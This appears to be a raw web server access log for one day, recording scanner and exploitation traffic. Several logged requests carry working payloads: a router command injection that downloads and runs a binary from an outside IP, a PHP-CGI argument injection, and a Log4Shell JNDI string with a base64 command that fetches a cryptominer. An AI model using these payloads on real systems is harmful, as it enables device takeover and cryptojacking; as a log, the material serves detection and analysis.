170.130.187.26 - - [18/Jun/2024:00:00:08 +0200] "GET / HTTP/1.1" 404 952 205.210.31.76 - - [18/Jun/2024:00:12:08 +0200] "GET / HTTP/1.0" 404 952 198.235.24.173 - - [18/Jun/2024:00:58:51 +0200] "GET / HTTP/1.1" 404 952 149.50.103.48 - - [18/Jun/2024:01:22:47 +0200] "GET / HTTP/1.1" 404 952 10.10.10.74 - - [18/Jun/2024:01:55:09 +0200] "GET / HTTP/1.1" 404 952 149.50.103.48 - - [18/Jun/2024:02:24:37 +0200] "GET / HTTP/1.1" 404 952 45.148.10.174 - - [18/Jun/2024:02:31:26 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 952 45.148.10.174 - - [18/Jun/2024:02:31:26 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 952 149.50.103.48 - - [18/Jun/2024:04:10:04 +0200] "GET / HTTP/1.1" 404 952 198.235.24.42 - - [18/Jun/2024:04:59:20 +0200] "GET / HTTP/1.1" 404 952 185.244.36.221 - - [18/Jun/2024:05:12:03 +0200] "GET / HTTP/1.1" 404 952 149.50.103.48 - - [18/Jun/2024:05:51:57 +0200] "GET / HTTP/1.1" 404 952 154.212.141.149 - - [18/Jun/2024:06:03:05 +0200] "GET / HTTP/1.1" 404 952 45.148.10.174 - - [18/Jun/2024:07:02:05 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 952 45.148.10.174 - - [18/Jun/2024:07:02:05 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 952 83.97.73.245 - - [18/Jun/2024:07:17:20 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 404 952 147.185.132.201 - - [18/Jun/2024:07:32:04 +0200] "GET / HTTP/1.1" 404 952 83.97.73.245 - - [18/Jun/2024:07:43:16 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 952 149.50.103.48 - - [18/Jun/2024:08:02:29 +0200] "GET / HTTP/1.1" 404 952 185.244.36.221 - - [18/Jun/2024:08:06:23 +0200] "GET / HTTP/1.1" 404 952 149.50.103.48 - - [18/Jun/2024:09:28:49 +0200] "GET / HTTP/1.1" 404 952 45.148.10.174 - - [18/Jun/2024:10:20:40 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 952 45.148.10.174 - - [18/Jun/2024:10:20:40 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 952 64.62.197.167 - - [18/Jun/2024:10:30:07 +0200] "GET / HTTP/1.1" 404 952 64.62.197.180 - - [18/Jun/2024:10:30:24 +0200] "GET /favicon.ico HTTP/1.1" 404 952 64.62.197.169 - - [18/Jun/2024:10:30:42 +0200] "GET /?format=json HTTP/1.1" 404 952 200.81.185.179 - - [18/Jun/2024:10:36:22 +0200] "POST /cgi-bin/ViewLog.asp HTTP/1.1" 404 952 2.187.31.193 - - [18/Jun/2024:10:51:22 +0200] "GET / HTTP/1.1" 404 952 149.50.103.48 - - [18/Jun/2024:10:58:36 +0200] "GET / HTTP/1.1" 404 952 185.244.36.221 - - [18/Jun/2024:11:02:08 +0200] "GET / HTTP/1.1" 404 952 45.128.232.200 - - [18/Jun/2024:11:11:49 +0200] "POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D""+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.1" 404 952 95.214.55.144 - - [18/Jun/2024:11:17:02 +0200] "GET /t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//149.12.245.132:3306/TomcatBypass/Command/Base64/a2lsbGFsbCAtOSBwYXJhaXNvLng4Njsga2lsbGFsbCAtOSB4bXJpZzsgY3VybCAtcyAtTCBodHRwOi8vZG93bmxvYWQuYzNwb29sLm9yZy94bXJpZ19zZXR1cC9yYXcvbWFzdGVyL3NldHVwX2MzcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO%7D%27) HTTP/1.1" 404 952 45.95.147.138 - - [18/Jun/2024:12:35:37 +0200] "GET / HTTP/1.1" 404 952 45.95.147.138 - - [18/Jun/2024:12:35:37 +0200] "GET / HTTP/1.1" 404 952 78.108.177.50 - - [18/Jun/2024:12:58:09 +0200] "GET / HTTP/1.0" 404 952 149.50.103.48 - - [18/Jun/2024:13:05:16 +0200] "GET / HTTP/1.1" 404 952 149.50.103.48 - - [18/Jun/2024:14:16:07 +0200] "GET / HTTP/1.1" 404 952 149.50.103.48 - - [18/Jun/2024:15:05:14 +0200] "GET / HTTP/1.1" 404 952 45.156.129.50 - - [18/Jun/2024:15:09:15 +0200] "GET / HTTP/1.1" 404 952 185.242.226.25 - - [18/Jun/2024:15:12:31 +0200] "GET / HTTP/1.1" 404 952 185.191.126.213 - - [18/Jun/2024:15:18:59 +0200] "GET / HTTP/1.1" 404 952 4.151.230.195 - - [18/Jun/2024:15:31:27 +0200] "GET /manager/text/list HTTP/1.1" 404 1006 115.231.78.12 - - [18/Jun/2024:15:46:31 +0200] "GET / HTTP/1.1" 404 952 115.231.78.12 - - [18/Jun/2024:15:48:08 +0200] "GET /robots.txt HTTP/1.1" 404 952 87.246.7.54 - - [18/Jun/2024:16:55:58 +0200] "GET / HTTP/1.0" 404 952 149.50.103.48 - - [18/Jun/2024:17:40:38 +0200] "GET / HTTP/1.1" 404 952 149.50.103.48 - - [18/Jun/2024:18:17:18 +0200] "GET / HTTP/1.1" 404 952 45.156.128.39 - - [18/Jun/2024:18:39:34 +0200] "GET / HTTP/1.1" 404 952 45.155.91.134 - - [18/Jun/2024:18:43:09 +0200] "GET / HTTP/1.1" 404 952 45.155.91.134 - - [18/Jun/2024:18:43:09 +0200] "GET / HTTP/1.1" 404 952 165.232.119.33 - - [18/Jun/2024:18:56:50 +0200] "GET / HTTP/1.1" 404 952 165.232.119.33 - - [18/Jun/2024:18:56:50 +0200] "GET /download/powershell/ HTTP/1.1" 404 952 45.148.10.174 - - [18/Jun/2024:19:22:15 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 952 45.148.10.174 - - [18/Jun/2024:19:22:15 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 952 104.168.70.165 - - [18/Jun/2024:19:22:23 +0200] "GET / HTTP/1.1" 404 952 205.210.31.198 - - [18/Jun/2024:19:46:42 +0200] "GET / HTTP/1.1" 404 952 45.148.10.174 - - [18/Jun/2024:20:04:10 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 952 45.148.10.174 - - [18/Jun/2024:20:04:10 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 952 149.50.103.48 - - [18/Jun/2024:20:04:26 +0200] "GET / HTTP/1.1" 404 952 87.236.176.149 - - [18/Jun/2024:20:17:13 +0200] "GET / HTTP/1.1" 404 952 10.128.0.99 - - [18/Jun/2024:20:25:41 +0200] "GET / HTTP/1.1" 404 952 205.210.31.212 - - [18/Jun/2024:21:09:08 +0200] "GET / HTTP/1.0" 404 952 221.122.67.75 - - [18/Jun/2024:22:11:45 +0200] "GET / HTTP/1.1" 404 952 172.212.60.238 - - [18/Jun/2024:22:14:19 +0200] "GET /manager/html HTTP/1.1" 401 1833 198.235.24.58 - - [18/Jun/2024:22:43:14 +0200] "GET / HTTP/1.1" 404 952 45.148.10.174 - - [18/Jun/2024:23:22:13 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 952 45.148.10.174 - - [18/Jun/2024:23:22:13 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 952 95.214.55.144 - - [18/Jun/2024:23:34:31 +0200] "GET /t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//149.12.245.132:3306/TomcatBypass/Command/Base64/a2lsbGFsbCAtOSBwYXJhaXNvLng4Njsga2lsbGFsbCAtOSB4bXJpZzsgY3VybCAtcyAtTCBodHRwOi8vZG93bmxvYWQuYzNwb29sLm9yZy94bXJpZ19zZXR1cC9yYXcvbWFzdGVyL3NldHVwX2MzcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO%7D%27) HTTP/1.1" 404 952 200.81.185.179 - - [18/Jun/2024:23:53:34 +0200] "POST /cgi-bin/ViewLog.asp HTTP/1.1" 404 952